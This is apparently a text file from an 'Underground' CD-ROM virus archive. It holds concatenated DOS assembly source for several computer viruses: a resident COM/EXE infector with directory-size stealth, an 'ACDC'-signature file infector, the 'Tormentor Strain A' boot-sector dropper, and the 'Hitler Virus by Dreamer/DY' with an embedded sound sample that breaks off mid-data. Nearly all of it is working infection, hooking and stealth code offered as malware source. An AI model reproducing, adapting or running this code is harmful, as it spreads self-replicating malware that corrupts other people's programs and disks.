Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / virgen / virusgen / V0003.DAT < prev

Wrap

Text File | 1996-05-26 | 129.8 KB | 4,886 lines

.radix 16 .model tiny .code code_len = top_code-main_entry data_len = top_data-top_code main_entry: call locate_address gen_count dw 0 locate_address: xchg ax,bp cld pop bx inc word ptr cs:[bx] mov ax,0d5aa int 21 cmp ax,2a03 jz all_done mov ax,sp inc ax mov cl,4 shr ax,cl inc ax mov dx,ss add ax,dx mov dx,ds dec dx mov es,dx xor di,di mov cx,(top_data-main_entry-1)/10+1 mov dx,[di+2] sub dx,cx cmp dx,ax jc all_done cli sub es:[di+3],cx mov [di+2],dx mov es,dx lea si,[bx+main_entry-gen_count] mov cx,top_code-main_entry rep db 2e movsb push ds mov ds,cx mov si,20 lea di,[di+old_vector-top_code] org $-1 mov ax,offset dos_handler xchg ax,[si+64] stosw mov ax,es xchg ax,[si+66] stosw mov ax,offset time_handler xchg ax,[si] stosw xchg ax,dx xchg ax,[si+2] stosw mov ax,24 stosw pop ds push ds pop es sti all_done: lea si,[bx+exe_header-gen_count] db 2e lodsw cmp ax,'ZM' jz exit_exe mov di,100 push di stosw movsb xchg ax,bp ret exit_exe: mov dx,ds add dx,10 add cs:[si+return_address+2-exe_header-2],dx org $-1 add dx,cs:[si+stack_offset+2-exe_header-2] org $-1 mov ss,dx mov sp,cs:[si+stack_offset-exe_header-2] org $-1 xchg ax,bp jmp dword ptr cs:[si+return_address-exe_header-2] org $-1 infect: mov dx,offset exe_header mov cx,top_header-exe_header mov ah,3f int 21 jc do_exit sub cx,ax jnz go_error mov di,offset exe_header les ax,[di+ss_offset-exe_header] org $-1 mov [di+stack_offset-exe_header],es org $-1 mov [di+stack_offset+2-exe_header],ax org $-1 les ax,[di+ip_offset-exe_header] org $-1 mov [di+return_address-exe_header],ax org $-1 mov [di+return_address+2-exe_header],es org $-1 mov dx,cx mov ax,4202 int 21 jc do_exit mov [di+file_size-exe_header],ax org $-1 mov [di+file_size+2-exe_header],dx org $-1 mov cx,code_len cmp ax,cx sbb dx,0 jc do_exit xor dx,dx mov si,'ZM' cmp si,[di] jz do_put_image cmp [di],'MZ' jz do_put_image cmp ax,0fe00-code_len jc put_image go_error: stc do_exit: ret do_put_image: cmp dx,[di+max_size-exe_header] org $-1 jz go_error mov [di],si put_image: mov ah,40 int 21 jc do_exit sub cx,ax jnz go_error mov dx,cx mov ax,4200 int 21 jc do_exit mov ax,[di+file_size-exe_header] org $-1 cmp [di],'ZM' jnz com_file mov dx,[di+file_size-exe_header+2] org $-1 mov cx,4 push di mov si,[di+header_size-exe_header] org $-1 xor di,di shift_size: shl si,1 rcl di,1 loop shift_size sub ax,si sbb dx,di pop di mov cl,0c shl dx,cl mov [di+ip_offset-exe_header],ax org $-1 mov [di+cs_offset-exe_header],dx org $-1 add dx,(code_len+data_len+100-1)/10+1 org $-1 mov [di+sp_offset-exe_header],ax org $-1 mov [di+ss_offset-exe_header],dx org $-1 add word ptr [di+min_size-exe_header],(data_len+100-1)/10+1 org $-2 mov ax,[di+min_size-exe_header] org $-1 cmp ax,[di+max_size-exe_header] org $-1 jc adjust_size mov [di+max_size-exe_header],ax org $-1 adjust_size: mov ax,[di+last_page-exe_header] org $-1 add ax,code_len push ax and ah,1 mov [di+last_page-exe_header],ax org $-1 pop ax mov cl,9 shr ax,cl add [di+page_count-exe_header],ax org $-1 jmp short put_header com_file: sub ax,3 mov byte ptr [di],0e9 mov [di+1],ax put_header: mov dx,offset exe_header mov cx,top_header-exe_header mov ah,40 int 21 jc error cmp ax,cx jz reset error: stc reset: ret find_file: pushf push cs call calldos test al,al jnz cant_find push ax push bx push es mov ah,51 int 21 mov es,bx cmp bx,es:[16] jnz not_infected mov bx,dx mov al,[bx] push ax mov ah,2f int 21 pop ax inc al jnz fcb_standard add bx,7 fcb_standard: mov ax,es:[bx+17] and ax,1f xor al,1e jnz not_infected and byte ptr es:[bx+17],0e0 sub es:[bx+1dh],code_len sbb es:[bx+1f],ax not_infected: pop es pop bx pop ax cant_find: iret dos_handler: cmp ah,4bh jz exec cmp ah,11 jz find_file cmp ah,12 jz find_file cmp ax,0d5aa jnz calldos not ax fail: mov al,3 iret exec: cmp al,2 jnc calldos push ds push es push ax push bx push cx push dx push si push di mov ax,3524 int 21 push es push bx mov ah,25 push ax push ds push dx push cs pop ds mov dx,offset fail int 21 pop dx pop ds mov ax,4300 int 21 jc exit test cl,1 jz open dec cx mov ax,4301 int 21 open: mov ax,3d02 int 21 jc exit xchg ax,bx mov ax,5700 int 21 jc close mov al,cl or cl,1f dec cx xor al,cl jz close push cs pop ds push cx push dx call infect pop dx pop cx jc close mov ax,5701 int 21 close: mov ah,3e int 21 exit: pop ax pop dx pop ds int 21 pop di pop si pop dx pop cx pop bx pop ax pop es pop ds calldos: jmp cs:[old_vector] .radix 10 adrtbl dw 1680,1838,1840,1842,1996,1998,2000,2002,2004,2154,2156 dw 2158,2160,2162,2164,2166,2316,2318,2320,2322,2324,2478 dw 2480,2482,2640 diftbl dw -324,-322,-156,158,-318,-316,318,156,162,316,164,-322 dw -162,-322,322,322,-324,-158,164,316,-324,324,-316,-164 dw 324 valtbl dw 3332,3076,3076,3076,3588,3588,3588,3588,3588,3844,3844 dw 3844,3844,3844,3844,3844,2564,2564,2564,2564,2564,2820 dw 2820,2820,2308 xlatbl dw -324,316,-164,156,-322,318,-162,158,-318,322,-158,162 dw -316,324,-156,164 .radix 16 time_handler: push ds push es push ax push bx push cx push dx push si push di push cs pop ds cld mov dx,3da mov cx,19 mov si,offset count mov ax,[si] test ah,ah jnz make_move mov al,ah mov es,ax cmp al,es:[46dh] jnz exit_timer mov ah,0f int 10 cmp al,2 jz init_diamond cmp al,3 jnz exit_timer init_diamond: inc byte ptr [si+1] sub bl,bl add bh,0b8 mov [si+2],bx mov es,bx wait_snow: in al,dx test al,8 jz wait_snow mov si,offset valtbl build_diamond: mov di,[si+adrtbl-valtbl] movsw loop build_diamond exit_timer: pop di pop si pop dx pop cx pop bx pop ax pop es pop ds jmp cs:[old_timer] count_down: dec byte ptr [si] jmp exit_timer make_move: test al,al jnz count_down inc byte ptr [si] mov si,offset adrtbl make_step: push cx push cs pop es lodsw mov bx,ax sub ax,140 cmp ax,0d20 jc no_xlat test ax,ax mov ax,[si+diftbl-adrtbl-2] jns test_xlat test ax,ax js do_xlat jmp short no_xlat test_xlat: test ax,ax js no_xlat do_xlat: mov di,offset xlatbl mov cx,10 repnz scasw dec di dec di xor di,2 mov ax,[di] mov [si+diftbl-adrtbl-2],ax no_xlat: mov ax,[si-2] add ax,[si+diftbl-adrtbl-2] mov [si-2],ax mov cx,19 mov di,offset adrtbl lookup: jcxz looked_up repnz scasw jnz looked_up cmp si,di jz lookup mov [si-2],bx mov ax,[si+diftbl-adrtbl-2] xchg ax,[di+diftbl-adrtbl-2] mov [si+diftbl-adrtbl-2],ax jmp lookup looked_up: mov es,[homeadr] mov di,bx xor bx,bx call out_char mov di,[si-2] mov bx,[si+valtbl-adrtbl-2] call out_char pop cx loop make_step jmp exit_timer out_char: in al,dx test al,1 jnz out_char check_snow: in al,dx test al,1 jz check_snow xchg ax,bx stosw ret stack_offset dd ? return_address dd ? db '7106286813' exe_header: int 20 last_page: nop top_code: db ? page_count dw ? dw ? header_size dw ? min_size dw ? max_size dw ? ss_offset dw ? sp_offset dw ? dw ? ip_offset dw ? cs_offset dw ? top_header: file_size dd ? old_vector dd ? old_timer dd ? count db ? flag db ? homeadr dw ? top_data: end done virus segment public 'code' assume cs:virus,ds:virus,es:virus org 0 VirusSize equ VirusEnd-$ Com: call Begin call Label2 SavedCode: mov ax,4c00h int 21h org SavedCode+5h Label2: pop si mov di,100h push di movsw movsw movsb ret Begin: push ds push es push ax xor ax,ax mov ds,ax mov ds,ds:[46ah] cmp Signature,0ACDCh je Exit mov ah,4ah mov bx,-1 int 21h sub bx,VirusParas1 jb Exit add bh,10h mov ah,4ah int 21h mov ah,48h mov bx,VirusParas2 int 21h jb Exit dec ax mov es,ax inc ax mov es:[1],ax mov es,ax push cs pop ds call Label1 Label1: pop si sub si,offset Label1 xor di,di push di mov cx,VirusSize rep movsb pop ds mov ax,ds:[84h] mov word ptr es:OldInt21[0],ax mov ax,ds:[86h] mov word ptr es:OldInt21[2],ax mov byte ptr ds:[467h],0eah mov word ptr ds:[468h],offset NewInt21 mov ds:[46ah],es mov word ptr ds:[84h],7 mov word ptr ds:[86h],46h Exit: pop ax pop ds pop es ret Header db 0e9h dw 0 Signature dw 0ACDCh NewInt21: cmp ah,4bh jne on1 jmp exec on1: cmp ah,4eh je find cmp ah,4fh je find jmp EOI Db ' As wolfs among sheep we have wandered ' Find: call interrupt ; call orginal interrupt jc Ret1 ; error ? pushf ; save registers push ax push bx push es mov ah,2fh call interrupt mov al,es:[bx+16h] ; get file-time (low byte) and al,1fh ; seconds cmp al,1fh ; 62 seconds ? jne FileOk ; no, file not infected sub word ptr es:[bx+1ah],VirusSize ; change file-size sbb word ptr es:[bx+1ch],0 Time: xor byte ptr es:[bx+16h],10h ; adjust file-time FileOk: pop es ; restore registers pop bx pop ax popf ret1: retf 2 Exec: push ax push bx push cx push dx push ds mov ax,3d02h call Interrupt jc short Error push cs pop ds mov bx,ax mov ah,3fh mov cx,5h mov dx,offset SavedCode call DOS cmp word ptr cs:SavedCode,'ZM' je short TheEnd ComFile:cmp word ptr cs:SavedCode[3],0ACDCh je short TheEnd mov al,02h call Seek or dx,dx cmp ah,0f6h je short Close sub ax,5 inc ax inc ax mov word ptr ds:Header[1],ax mov ax,5700h call dos push cx push dx mov ah,40h mov cx,VirusSize xor dx,dx call DOS mov al,00h call Seek mov ah,40h mov cx,5 mov dx,offset Header call dos Close: mov ax,5701h pop dx pop cx or cl,1fh call dos TheEnd: mov ah,3eh call Interrupt Error: pop ds pop dx pop cx pop bx pop ax EOI: db 0eah ; jmp 0:0 OldInt21 dd 026b1465h Seek: mov ah,42h xor cx,cx xor dx,dx DOS: call Interrupt jnc Ok pop ax jmp Close Interrupt: pushf call cs:OldInt21 Ok: ret VirusEnd equ $ VirusParas1 equ (VirusSize+1fh)/10h+1000h VirusParas2 equ (VirusSize+0fh)/10h virus ends end done code_seg segment assume cs:code_seg,ds:code_seg org 100h tormentor proc far @disp macro string mov dx,offset string mov ah,09h int 21h endm @exit macro mov ax,4c00h int 21h endm @cls macro mode mov ah,00h mov al,mode int 10h endm start: jmp main boot_area dw 256 dup (0) boot_sec dw 512 dup (0) message db "Tormentor Strain A",13,10 db "Written by The High Evolutionary",13,10 db "Copyright (C) 1991 by The RABID Nat'nl Development Corp." db 13,10,13,10 db "Press any key to install onto media in drive A:",13,10 db "(Or press CTRL-C to abort)$",13,10 paused db 13,10,13,10 db "[Paused] Insert destination disk if desired and press",13,10 db "any key, otherwise, press any key$",13,10 done db "Done!$",13,10 r_fail db 13,10,13,10 db "Failed to READ in boot sector$",13,10 w_fail db 13,10,13,10 db "Failed to WRITE boot sector$",13,10 f_infec db 13,10,13,10 db "SHIT! We failed to write the virus code to the disk!!!$",13,10 r_boot db 13,10,13,10 db "Now READING in the boot sector$",13,10 w_boot db 13,10,13,10 db "Now WRITING the boot sector to track 719$",13,10 w_vir db 13,10,13,10 db "Now WRITING the VIRUS to the boot sector$",13,10 succ db 13,10,13,10 db "Success! We installed Tormentor onto the drive$",13,10 memerr db 13,10,13,10 db "BOMB! We had a memory allocation error. Bailing out...$",13,10 db 13,10 read_shit db 13,10,13,10 db "Reading in shit via INT 25...$",13,10 db 13,10 intro db "You are in Torment$",13,10 bootseg dw ? ; Storage segment address or mem. block ; containing copy of boot record dssave dw ? ; Storage for DS register ;dssave dw seg group ; Storage for DS register pspseg dw ? ; PSP segment storage ;stack segment para stack 'STACK' ; Code Segment ;stack ends ;_data segment word public 'DATA' ; Data Segment ;_data ends ;dgroup group data,stack ; Define segment group ;***************************************************************************** ; Boot record information to infect both floppies and hard-drives ;***************************************************************************** bootrecord struc bootjump db 3 dup (?) ; Initial 3 byte jmp instruction oemstring db 8 dup (?) ; OEM version and DOS sectorbytes dw ? ; Bytes per sector clustersec db ? ; Sectors per cluster reservedrec dw ? ; Reserved sectors fatcopies db ? ; number of FAT copies direntries dw ? ; number of root dir entries totalsectors dw ? ; Total disk sectors mediadescrip db ? ; Media Descriptor fatsectors dw ? ; number of sectors occupied by 1 FAT tracksectors dw ? ; number of sectors per track heads dw ? ; number of heads hiddensectors dw ? ; number of hidden sectors bootrecord ends drive db ? ; Current drive pointer memalloc proc near push bp ; Save base pointer push bx ; Save BX mov bp,sp ; init base pointer xor al,al ; Zero out AL mov ah,48h ; Allocate mem. function int 21h jnc end_memalloc ; exit if no error mov word ptr [bp],bx end_memalloc: pop bx ; Restore BX pop bp ; Restore Base Pointer ret memalloc endp main: get_default_drive: mov ah,19h int 21h mov byte ptr drive,al ; Move current drive into drive ; mov ds,dssave ; Initialise DS ; mov ax,es ; get PSP address ; mov word ptr pspseg,ax ; and save it... jmp read_boot ; mov bx,40h ; Allocate 1024 bytes ; call memalloc ; Allocate BX block of memory ; jnc read_boot ; @disp memerr ; jmp quit read_boot: @disp read_shit mov ah,08h int 21h mov word ptr bootseg,ax push ax ; Save AX onto the stack mov al,0 ; mov al,byte ptr drive ; Move current drive into AL xor ah,ah ; Zero out AH ; pop ds ; Restore Data_seg pushf ; Save flags mov dx,0 ; Read in sector 0 mov cx,1 ; Read in 1 sector mov bx,offset boot_sec ; Store data at DS:boot_sec int 25h ; Read in the disk popf ; clear flags used by flags @disp done mov ah,08h int 21h ; assume ds:code_seg ; Restore DS begin: @cls 03 ; mov ah,00 ; Set screen ; mov al,03 ; Set screen for 80x25 color ; int 10h ; Call BIOS @disp message mov ah,08h ; Wait for a keypress int 21h mov cx,3 read_sector: @disp r_boot ; Display that we are reading the ; sector from the disk push cx ; Counter is pushed onto the stack mov ax,201h ; Read in 1 sector mov bx,offset boot_area ; Store it in boot_area mov cx,1 ; Set counter to 1 mov dx,0 ; Set for drive 0, head 0 int 13h ; Call BIOS pop cx ; Restore counter jnc good_read ; If there were no errors, then ; jump to good_read loop read_sector ; Jump back and try reading the sector ; again while CX>0 @disp r_fail mov ax,4c00h ; Exit int 21h ; Call DOS good_read: mov cx,3 ; Set counter to 3 @disp paused ; Display message for pause mov ah,08h ; Wait for a key int 21h ; Call DOS ;***************************************************************************** ; Write good sector to track 719 (Head 1, track 27, sector 9) ;***************************************************************************** write_sector: @disp w_boot ; Display that we are writing the ; sector to disk mov ax,301h ; Set for writing the boot sector mov bx,offset boot_area ; Set buffer to what we read in ; mov bx,offset infected_data mov cx,2709h ; Set counter to 2709h mov dx,100h ; Head 1, drive 0 int 13h ; Call BIOS pop cx ; Restore the counter jnc good_write ; If we wrote the sectors allright, ; then jump to good_write loop write_sector @disp w_fail mov ax,4c00h ; Exit int 21h ; Call DOS good_write: mov cx,3 ; Copy 3 into CX @disp w_vir infect_floppy: push cx ; Push it onto the stack mov ax,301h ; Write 1 sector mov bx,offset infected_data ; Write corrupt boot sector to the ; drive mov cx,1 ; Set counter to 1 mov dx,0 ; Set for drive A: int 13h ; Call BIOS jnc good_infection ; If there are no problems, then ; continue loop infect_floppy ; Otherwise, try again until CX=0 @disp f_infec ; If CX=0, then display the message ; and then exit mov ax,4c00h ; Exit int 21h ; Call DOS good_infection: @disp succ mov ax,4c00h int 21h ;***************************************************************************** ; The following is a copy of the infected boot sector to copy to sector 0 ;***************************************************************************** infected_data db 0EBh, 34h nop dec cx inc dx dec bp and [bx+si],ah xor bp,word ptr ds:[33h] add al,[bp+si] add [bx+si],ax add dh,[bx+si+0] rol byte ptr [bp+si],1 ; Rotate std ; Set direction flag add al,[bx+si] or [bx+si],ax add al,[bx+si] db 19 dup (0) ; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' adc al,[bx+si] add [bx+si],al add [bx+di],al add dl,bh xor ax,ax ; Zero register mov ds,ax mov ss,ax mov bx,7C00h ; Pointer to boot segment mov sp,bx push ds data_14 db 53h dec word ptr ds:[413h] int 12h ; Put (memory size)/1K in ax mov cl,6 shl ax,cl ; Shift w/zeros fill mov es,ax xchg ax,word ptr ds:[4Eh] mov word ptr ds:[7DABh],ax mov ax,128h xchg ax,word ptr ds:[4Ch] mov word ptr ds:[7DA9h],ax mov ax,es xchg ax,word ptr ds:[66h] mov word ptr ds:[7DAFh],ax mov ax,0BBh xchg ax,word ptr ds:[64h] mov word ptr ds:[7DADh],ax xor di,di ; Zero register mov si,bx mov cx,100h cld ; Clear direction rep movsw ; Rep when cx >0 Mov [si] to es:[di] sti ; Enable interrupts push es mov ax,85h push ax retf push bx xor dl,dl ; Zero register call sub_2 ; (00FB) pop bx push ds pop es mov ah,2 mov dh,1 call sub_6 ; (011F) jc loc_2 ; Jump if carry Set push cs pop ds mov si,offset ds:[0Bh] mov di,offset ds:[7C0Bh] mov cx,2Bh cld ; Clear direction repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] jz loc_ret_3 ; Jump if zero loc_2: pop bx pop ax push cs mov ax,0AFh push ax loc_ret_3: retf ; Return far read_error: push cs pop ds mov si,1DBh call sub_1 ; (00DA) xor ah,ah ; Zero register int 16h ; Keyboard i/o ah=function 00h ; get keybd char in al, ah=scan xor ax,ax ; Zero register int 13h ; Disk dl=drive a ah=func 00h ; reset disk, al=return status push cs pop es mov bx,offset ds:[200h] mov cx,6 xor dx,dx ; Zero register mov ax,201h int 13h ; Disk dl=drive a ah=func 02h ; read sectors to memory es:bx jc read_error ; Jump if carry Set mov cx,0FF0h mov ds,cx jmp dword ptr cs:data_16 ; ; Insert Tormentor endp here... ; ;tormentor endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_1 proc near loc_5: mov bx,7 cld ; Clear direction lodsb ; String [si] to al or al,al ; Zero ? jz loc_ret_9 ; Jump if zero jns loc_6 ; Jump if not sign xor al,0D7h or bl,88h loc_6: cmp al,20h jbe loc_7 ; Jump if below or = mov cx,1 mov ah,9 ; int 10h ; Video display ah=functn 09h ; set char al & attrib bl @curs loc_7: mov ah,0Eh int 10h ; Video display ah=functn 0Eh ; write char al, teletype mode jmp short loc_5 ; (00DA) ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_2: mov bx,200h mov cx,2 mov ah,cl call sub_5 ; (011D) mov cx,2709h xor byte ptr es:[bx],0FDh jz loc_8 ; Jump if zero mov cx,4F0Fh loc_8: jmp short loc_ret_9 ; (0127) nop ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_3: mov ah,2 mov bx,200h ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_4: mov cx,1 ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_5: mov dh,0 ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_6: mov al,1 ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_7: pushf ; Push flags call dword ptr cs:data_15 loc_ret_9: retn sub_1 endp push ax push bx push cx push dx push es push ds push si push di pushf ; Push flags push cs pop ds cmp dl,1 ja loc_11 ; Jump if above and ax,0FE00h jz loc_11 ; Jump if zero xchg al,ch shl al,1 ; Shift w/zeros fill add al,dh mov ah,9 mul ah ; ax = reg * al add ax,cx sub al,6 cmp ax,6 ja loc_11 ; Jump if above push cs pop es call sub_3 ; (0115) jc loc_10 ; Jump if carry Set mov di,offset data_14 mov si,offset ds:[243h] mov cx,0Eh std ; Set direction flag repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to ; es:[di] jz loc_11 ; Jump if zero sub si,cx sub di,cx mov cl,33h ; '3' rep movsb ; Rep when cx >0 Mov [si] to ; es:[di] call sub_2 ; (00FB) push cx push bx call sub_3 ; (0115) mov ah,3 xor bx,bx ; Zero register call sub_4 ; (011A) pop bx pop cx jc loc_10 ; Jump if carry Set mov dh,1 mov ah,3 call sub_6 ; (011F) loc_10: xor ax,ax ; Zero register call sub_7 ; (0121) loc_11: mov ah,4 int 1Ah ; Real time clock ah=func 04h ; read date cx=year, dx=mon/day cmp dh,9 jne not_month ; Jump if not equal mov si,1B1h call sub_1 ; (00DA) not_month: popf ; Pop flags pop di pop si pop ds pop es pop dx pop cx pop bx pop ax jmp dword ptr cs:data_15 data_15 dd 0C602EC59h data_16 dd 0F000E6F2h esc 2,ch ; coprocessor escape and [bp+di-4141h],al movsb ; Mov [si] to es:[di] idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data xchg ax,si mov si,offset ds:[0B4A5h] mov ax,0DAA7h esc 5,[bx+si] ; coprocessor escape db 'IO SYSMSDOS SYS', 0Dh, 0Ah db 'Non-system disk or disk error', 0Dh db 0Ah add [bx+si],al push bp ; jmp cont ; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' stosb ;cont: stosb ; Store al to es:[di] tormentor endp quit: mov ax,4c00h int 21h code_seg ends end start done call rakett old db '═ É!¡' rakett: pop bp push bp add bp,-103h mov ax,42ABh int 21h jnc failed cli mov ax,3521h int 21h mov w [bp+offset old21],bx mov w [bp+offset old21+2],es mov al,1Ch int 21h cli mov w [bp+offset old1C],bx mov w [bp+offset old1C+2],es mov w [bp+offset teller],16380 sti call normalspeed mov si,ds std lodsb cld mov ds,si xor bx,bx mov cx,pgf cmp b [bx],'Z' jne failed mov ax,[bx+3] sub ax,cx jc failed mov [bx+3],ax sub [bx+12h],cx mov es,[bx+12h] push cs pop ds mov di,100h mov si,bp add si,di mov cx,size rep movsb push es pop ds mov ax,2521h mov dx,offset ni21 int 21h mov al,1Ch mov dx,offset ni1C int 21h failed: push cs push cs pop ds pop es pop si mov di,100h push di movsw movsw movsb mov cx,0FFh mov si,100h ret findFCB: popf call int21 pushf or al,al jnz backFCB call stealth backFCB: popf iret stealth: push ax push bx push dx push es mov ah,2Fh call int21 cmp byte es:[bx],0FFh jne normFCB add bx,8 normFCB: mov al,byte es:[bx+16h] and al,31 xor al,31 jnz shitFCB mov ax,word es:[bx+1Ch] mov dx,word es:[bx+1Ch+2] sub ax,size sbb dx,0 jc shitFCB mov word es:[bx+1Ch],ax mov word es:[bx+1Ch+2],dx shitFCB: pop es pop dx pop bx pop ax ret ni21: pushf cmp ah,11h je findFCB cmp ah,12h je findFCB cmp ax,42ABh jne not_42AB popf clc retf 2 not_42AB: cmp ax,4B00h jne not_4B00 call install_24 push ax push bx push cx push dx push ds push bp mov ax,4300h call int21 jc back1 mov cs:old_attr,cx test cl,4 jnz back1 mov ax,4301h xor cx,cx call int21 jc back1 push dx push ds call infect pop ds pop dx mov ax,4301h db 0B9h ;mov CX,... old_attr dw 0 call int21 back1: ;go here if the attrib-get fails pop bp pop ds pop dx pop cx pop bx pop ax call remove_24 not_4B00: back: popf db 0EAh old21 dw 0,0 int21: pushf call dword ptr cs:old21 ret infect: mov ax,3D02h call int21 jnc okay_open bad1: ret okay_open: xchg bx,ax mov ax,5700h call int21 push cx mov bp,sp push dx mov ah,3Fh mov cx,5 mov dx,offset old push cs pop ds call int21 jc close cmp al,5 jne close cmp word old[0],'MZ' je close cmp word old[0],'ZM' je close cmp old[0],0E9h jne infect1 cmp word old[3],'¡!' jne infect1 close: pop dx pop cx mov ax,5701h call int21 mov ah,3Eh call int21 ret infect1: mov ax,4202h xor cx,cx xor dx,dx call int21 or dx,dx jnz close cmp ax,59000 jae close dec ax dec ax dec ax mov word ptr putjmp[1],ax mov ah,40h mov cx,size mov dx,100h call int21 jc close cmp ax,size jne close mov ax,4200h xor cx,cx xor dx,dx call int21 mov ah,40h mov cx,5 mov dx,offset putjmp call int21 or byte ss:[bp],31 jmp close putjmp db 0E9h dw 0 db '!¡' install_24: pushf cli push bx push ds xor bx,bx mov ds,bx push ds lds bx,[24h*4] mov cs:old24[0],bx mov cs:old24[2],ds pop ds mov word [(24h*4)],offset ni24 mov [(24h*4)+2],cs pop ds pop bx sti popf ret remove_24: pushf cli push bx push es push ds xor bx,bx mov ds,bx les bx,cs:old24[0] mov [(24h*4)],bx mov [(24h*4)+2],es pop ds pop es pop bx sti popf ret errflag db 0 db 'Hitler Virus by Dreamer/DY',0 ni24: mov al,3 mov cs:errflag,1 iret old24 dw 0,0 xofs dw offset sample len equ 4131 divisor equ 230 teller dw 16380 ni1C: cli pushf push ax push ds push si push cs pop ds cmp teller,0 je teller_ok dec teller jmp noreset teller_ok: mov al,34h db 0E6h,43h ;out 43h,al mov al,divisor db 0E6h,40h ;out 40h,al mov al,0 db 0E6h,40h ;out 40h,al mov al,090h db 0E6h,43h ;out 43h,al mov si,xofs lodsb db 0E6h,42h ;out 42h,al db 0E4h,61h ;in al,61h or al,3 db 0E6h,61h ;out al,61h inc xofs cmp xofs,len+offset sample jb noreset mov xofs,offset sample noreset: sti pop si pop ds pop ax popf db 0EAh old1C dw 0,0 normalspeed: cli push ax mov al,34h db 0E6h,43h mov al,0 db 0E6h,40h db 0E6h,40h pop ax sti ret sample: db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h db 